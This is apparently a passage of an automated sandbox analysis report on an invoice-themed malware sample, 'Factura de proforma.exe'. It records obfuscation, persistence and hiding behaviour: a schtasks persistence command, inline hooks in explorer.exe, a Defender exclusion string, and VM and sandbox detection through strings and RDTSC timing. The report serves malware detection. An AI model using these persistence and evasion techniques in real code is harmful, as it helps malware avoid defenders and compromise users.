            Source: Binary string: cscript.pdb source: RegSvcs.exe, 00000006.00000002.406155784.00000000036A0000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Factura de proforma.exe, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tskpCbAwtxoaw.exe.0.dr, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.Factura de proforma.exe.7a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.Factura de proforma.exe.7a0000.0.unpack, MapEditor1/CreateMapDialog.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Factura de proforma.exeCode function: 0_2_070C4BBD push FFFFFF8Bh; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D4B5 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D56C push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D502 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D50B push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419F75 push ebx; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0163D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0483D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029A9F75 push ebx; iretd
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD4B5 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD50B push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD502 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_029AD56C push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.7904887088
            Source: initial sampleStatic PE information: section name: .text entropy: 7.7904887088
            Source: C:\Users\user\Desktop\Factura de proforma.exeFile created: C:\Users\user\AppData\Roaming\tskpCbAwtxoaw.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Factura de proforma.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.Factura de proforma.exe.2bd16b0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Factura de proforma.exe PID: 6952, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002999904 second address: 000000000299990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000002999B7E second address: 0000000002999B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Factura de proforma.exe TID: 6384Thread sleep time: -45175s >= -30000s
            Source: C:\Users\user\Desktop\Factura de proforma.exe TID: 4852Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 7112Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\cscript.exe TID: 6368Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409AB0 rdtsc
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cscript.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 45175
            Source: C:\Users\user\Desktop\Factura de proforma.exeThread delayed: delay time: 922337203685477
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 00000007.00000000.362850284.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000007.00000000.354893243.000000000EE50000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
            Source: explorer.exe, 00000007.00000000.375277413.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 00000007.00000000.333973345.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: explorer.exe, 00000007.00000000.333973345.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: explorer.exe, 00000007.00000000.337688862.00000000087C2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
            Source: explorer.exe, 00000007.00000000.352399767.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409AB0 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01604120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016741E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016669A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01600050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01600050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01667016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015FB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0167B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016290AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01663884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01613B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01613B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015EDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016103E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0160DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016653CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016653CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01614BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015F1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016A138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0161B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01612397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0169B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_016B8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0162927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015E9240 mov eax, dword ptr fs:[00000030h]
